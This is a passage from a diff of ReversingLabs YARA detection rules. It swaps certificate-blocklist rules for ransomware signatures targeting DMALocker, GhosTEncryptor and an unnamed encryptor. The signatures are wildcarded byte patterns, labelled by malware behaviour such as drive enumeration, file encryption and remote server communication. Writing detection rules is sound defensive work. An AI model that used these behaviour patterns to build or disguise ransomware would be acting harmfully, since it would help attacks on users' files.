+            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
+            FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? A8 ??
+            0F 85 ?? ?? ?? ?? A8 ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 C6 45 ?? ?? 8B 4E ?? 8B 56 ?? 3B CA 73
+            ?? 8D 41 ?? 89 46 ?? 8B C6 83 FA ?? 72 ?? 8B 06 C7 04 48 ?? ?? ?? ?? EB ?? 6A ?? C6
+            85 ?? ?? ?? ?? ?? 8B CE FF B5 ?? ?? ?? ?? 6A ?? E8
+        }
+		$find_drives = {
+            68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? BE ?? ?? ?? ?? 0F 84 ??
+            ?? ?? ?? 8B CE C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 51 ?? 8A 01
+            41 84 C0 75 ?? 2B CA 51 56 8D 4D ?? E8 ?? ?? ?? ?? 83 EC ?? C7 45 ?? ?? ?? ?? ?? 8B
+            CC 89 65 ?? 33 C0 6A ?? 68 ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 66
+            89 01 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8D 55 ?? 8B CC E8 ?? ?? ?? ?? C6 45 ?? ??
+            E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B
+            C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8
+            ?? ?? ?? ?? 83 C4 ?? 8B C6 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 46 03 F0 38 0E 0F 85
+            ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5
+            5D C3 E8 ?? ?? ?? ?? E8
+        }
+		$encrypt_files_p1 = {
+            8B 00 50 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B F0 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ??
+            42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ??
+            ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 83 FA ??
+            72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ??
+            83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B
+            CB C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 E6 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 66 89
+            85 ?? ?? ?? ?? 8D 51 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 51 53 8D 8D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 78 ?? ?? 72 ?? 8B 00 56 50 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 FA
+            ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1
+            83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ??
+            ?? 8B 95 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6
+            85 ?? ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA
+            ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51
+            E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF
+            15 ?? ?? ?? ?? 8B D8 8D 45 ?? 50 53 89 9D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 7D ?? ??
+            0F 8C ?? ?? ?? ?? 7F ?? 81 7D ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 53
+            FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 8B F8 89 BD ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 57 E8 ?? ?? ?? ??
+            B9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? BE ?? ?? ?? ?? 83 C4 ?? F3 A5 8D 8D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 33 F6
+        }
+		$encrypt_files_p2 = {
+            8B 86 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 86 ?? ?? ?? ?? 89 85 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89
+            86 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 86 ?? ?? ?? ?? 83 C6 ?? 81 FE ?? ?? ?? ?? 7C ??
+            6A ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 68 ?? ?? ?? ?? 53
+            FF 15 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? 8B F4 8B CA 33 C0
+            C7 46 ?? ?? ?? ?? ?? 8D 79 ?? C7 46 ?? ?? ?? ?? ?? 66 89 06 66 8B 01 83 C1 ?? 66 85
+            C0 75 ?? E9 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 53 8B 1D ?? ?? ?? ?? FF D3 6A ?? 8D 45 ??
+            50 FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B
+            F8 89 BD ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? BE ?? ?? ?? ?? F3 A5 8B 45 ?? 8D 8D ?? ?? ?? ?? 50 68
+            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56
+            FF D3 6A ?? 8D 45 ?? 50 FF 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 56 FF 15
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Digisign Server ID - (Enrich)" and pe.signatures [ i ] . serial == "4c:0e:63:6a" and 1320191999 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $find_drives and $find_files and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_072714A9 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Dmalocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects DMALocker ransomware."
 		author = "ReversingLabs"
-		id = "15ad6936-78a4-58b1-8c68-27ec4ed38649"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "3ddef0f1-61c9-59f6-a02c-35768c2cd4d6"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L981-L997"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "8bea4cfb60056446043ef90a7d01ecc52d82d9e7005a145a4daa61a522ecd2ae"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.DMALocker.yara#L1-L149"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "107dbc4cacd9d451e9c6fe8aa91cd612f70ac767ee70f74f3a77d1e5548b054f"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "DMALocker"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$dmalock_v1_encrypt_files_1 = {
+            83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ??
+            ?? ?? A3 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83
+            F8 ?? 75 ?? 32 C0 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8A 9D ?? ?? ??
+            ?? 33 C0 84 DB 74 ?? EB ?? 8D [2-5] 8A 90 ?? ?? ?? ?? 84 D2 74 ?? 8A 8C 05
+            ?? ?? ?? ?? 3A CA 74 ?? 80 F1 ?? 3A CA 75 ?? 40 80 BC 05 ?? ?? ?? ?? ?? 75 ?? 8A 8C
+            05 ?? ?? ?? ?? 3A 88 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 33 C0 84 DB 74 ?? 8A 90 ?? ?? ??
+            ?? 84 D2 74 ?? 8A 8C 05 ?? ?? ?? ?? 3A CA
+        }
+		$dmalock_v1_encrypt_files_2 = {
+            EB ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B BD ?? ?? ?? ??
+            8D 95 ?? ?? ?? ?? 52 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15 ?? ?? ??
+            ?? 8B 4D ?? 5F 5E 33 CD B0 ?? 5B E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$dmalock_v1_encrypt_files_3 = {
+            74 ?? 80 F1 ?? 3A CA 75 ?? 40 80 BC 05 ?? ?? ?? ?? ?? 75 ?? 8A 8C 05 ?? ?? ?? ?? 3A
+            88 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 56 8D 95 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 52 E8 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 83 C4 ?? A8 ?? 74 ?? A8 ?? 0F 85 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 50 56 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 55
+            ?? 8B 85 ?? ?? ?? ?? 52 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4
+        }
+		$dmalock_v1_enum_shares_and_discs_type_1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 57 68 ?? ??
+            ?? ?? 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? 83 C4 ?? 89 ?? ?? ?? ?? ?? C6 85 ??
+            ?? ?? ?? ?? 85 ?? 0F 84 ?? ?? ?? ?? ?? 32 DB E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? ??
+            8B F8 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 ?? 6A ?? 89 45 ?? 66 89 45 ?? 88 45 ?? 8D 45 ??
+            6A ?? 50 88 5D ?? E8 ?? ?? ?? ?? 6A ?? 8D 4D ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83
+            C4 ?? 85 C0 75 ?? B3 ?? 6A ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 DB 74 ?? ?? E8 ?? ??
+            ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 32 C0 5F 5E 5B 8B 4D ?? 33 CD
+            E8 ?? ?? ?? ?? 8B E5 5D C3 8D 95 ?? ?? ?? ?? 52 ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 83 BD ?? ?? ?? ?? ?? 77 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 72 ?? C6
+            85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ??
+            8B 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 51 52 68
+        }
+		$dmalock_v1_enum_shares_and_discs_type_2 = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 8B 5D ?? 56 57
+            8D 8D ?? ?? ?? ?? 51 50 6A ?? 6A ?? 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 33 C0 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 ?? ?? 8B 95 ?? ?? ??
+            ?? 52 6A ?? FF 15 ?? ?? ?? ?? 8B F8 89 BD ?? ?? ?? ?? 85 FF 75 ?? 50 68 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 ??
+            ?? 8D A4 24 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 6A ?? 57 E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 57 8D 95 ?? ?? ?? ?? 52 50 FF 15 ?? ?? ?? ?? 85 C0
+            0F 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 39 85 ?? ?? ?? ?? 76 ?? 8D 77 ?? EB ?? 8D A4 24
+            ?? ?? ?? ?? 83 7E ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 51
+            C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 0E 8B C1 83 C4 ?? 8D 78 ?? 8B FF 8A 10 40 84
+            D2 75 ?? 2B C7 50 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8B 06 83 C4 ?? 8D 50 ?? 90
+            8A 08 40 84 C9 75 ?? 2B C2 6A ?? 8D 84 05 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 8B 4D ?? 83 C4 ?? 51 8D 95 ?? ?? ?? ?? 53 52 E8 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 83
+            C4 ?? 8B 46 ?? 83 E0 ?? 3C ?? 75 ?? 8B 4D ?? 51 53 8D 56 ?? 52 E8 ?? ?? ?? ?? 85 C0
+            75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 40 83 C6 ?? 89 85 ??
+            ?? ?? ?? 3B 85 ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? E9 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 50
+            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 57 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF
+            15 ?? ?? ?? ?? 8B 4D ?? F7 D8 5F 1B C0 5E 33 CD 40 5B E8 ?? ?? ?? ?? 8B E5 5D C2
+        }
+		$dmalock_v1_enum_shares_and_discs_type_3 = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 57 68 ?? ??
+            ?? ?? 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? A3 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? 6A ?? 51 8B D8 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? A3 ?? ?? ?? ?? BF ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? F7 C3 ?? ?? ?? ?? 76 ?? 57 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ??
+            ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8B F0 56 68
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 FE ?? 74 ?? 83 FE ?? 74 ?? 83 FE ?? 75 ?? 8B
+            55 ?? 8B 85 ?? ?? ?? ?? 52 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 47 D1 EB
+            FF 8D ?? ?? ?? ?? 75 ?? 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$dmalock_v2_enum_logical_disks = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 33 DB 68 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 53 50 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F BE 4D ?? 51 8D 95 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 88 9D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ??
+            ?? 52 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            85 C0 75 ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ??
+            B0 ?? 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 4D ?? 8A C3 33 CD 5B E8 ?? ??
+            ?? ?? 8B E5 5D C3
+        }
+		$dmalock_v4_remote_server_communication = {
+            85 FF 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 83 FB ?? 0F
+            87 ?? ?? ?? ?? FF 24 9D ?? ?? ?? ?? 8B 46 ?? 50 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83
+            C4 ?? B0 ?? C3 8B 4E ?? 8B 56 ?? 51 52 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B0
+            ?? C3 8B 46 ?? 8B 4E ?? 50 51 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B0 ?? C3 8B
+            56 ?? 8B 46 ?? 52 50 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B0 ?? C3 8B 4E ?? 8B
+            56 ?? 51 52 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B0 ?? C3 8B 46 ?? 8B 4E ?? 8B
+            56 ?? 50 51 52 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B0 ?? C3 8B 46 ?? 8B 4E ??
+            50 51 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B0 ?? C3 32 C0 C3
+        }
+		$dmalock_v4_encrypt_file_1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 57 68 ?? ??
+            ?? ?? 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? 56
+            32 DB E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 56 8B F8 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 56
+            6A ?? 89 45 ?? 89 45 ?? 66 89 45 ?? 8D 45 ?? 6A ?? 50 88 5D ?? E8 ?? ?? ?? ?? 6A ??
+            8D 4D ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B3 ?? 6A ?? 57 56 E8
+            ?? ?? ?? ?? 83 C4 ?? 84 DB 74 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5F 5E 5B 8B 4D ??
+            33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$dmalock_v4_encrypt_file_2 = {
+            68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 6A ?? 52 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 89 B5 ?? ?? ??
+            ?? 85 F6 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B
+            D8 6A ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 83 3D ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? 0F 85 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 89 B5 ?? ?? ?? ?? 85 F6 74
+            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 46 ?? 85 C0 74 ?? 8B 75 ?? B9 ?? ?? ??
+            ?? 8B F8 F3 A5 66 A5 8B B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 46
+            ?? EB ?? 33 F6 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 7E ?? 57 89 35 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 8B C6 E8 ?? ?? ?? ?? 84 C0 74 ?? 8B 4E ?? 8B 17 56 6A
+            ?? 6A ?? 68 ?? ?? ?? ?? 51 52 FF 15 ?? ?? ?? ?? 85 C0 74 ?? C6 46 ?? ?? 8B B5 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 50 53 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 56 6A ?? 6A ?? 68
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 56 52 6A ?? 53 E8 ?? ?? ?? ?? 8B 45 ??
+            8B 8D ?? ?? ?? ?? 56 50 6A ?? 51 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 5F 5E 33
+            CD B8 ?? ?? ?? ?? 5B E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Digisign Server ID (Enrich)" and pe.signatures [ i ] . serial == "07:27:14:a9" and 1320191999 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $dmalock_v1_encrypt_files_1 and $dmalock_v1_encrypt_files_2 and $dmalock_v1_encrypt_files_3 and $dmalock_v1_enum_shares_and_discs_type_1 ) or ( $dmalock_v1_encrypt_files_1 and $dmalock_v1_encrypt_files_2 and $dmalock_v1_encrypt_files_3 and $dmalock_v1_enum_shares_and_discs_type_2 ) or ( $dmalock_v1_encrypt_files_1 and $dmalock_v1_encrypt_files_2 and $dmalock_v1_encrypt_files_3 and $dmalock_v1_enum_shares_and_discs_type_3 ) or ( $dmalock_v1_encrypt_files_1 and $dmalock_v1_encrypt_files_3 and $dmalock_v1_enum_shares_and_discs_type_1 and $dmalock_v2_enum_logical_disks ) or ( $dmalock_v4_encrypt_file_1 and $dmalock_v4_encrypt_file_2 and $dmalock_v4_remote_server_communication and $dmalock_v2_enum_logical_disks )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_00D8F35F4Eb7872B2Dab0692E315382Fb0 : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Ghostencryptor : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects GhosTEncryptor ransomware."
 		author = "ReversingLabs"
-		id = "2c051732-76d7-5562-a79e-c5bbdc8373b2"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "9f035e39-e0fe-54f3-8206-08fbbd9206b4"
+		date = "2021-08-12"
+		modified = "2021-08-12"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L999-L1017"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "463757c59c32859163ea80e694e1f39239c857124aad3895f22f83b47645910c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/ByteCode.MSIL.Ransomware.GhosTEncryptor.yara#L1-L69"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "85c1f6e5acf746388b0a9ddeb1f0ad1d2219fff7358c9a981849863155c13e3c"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "GhosTEncryptor"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$enum_folders = {
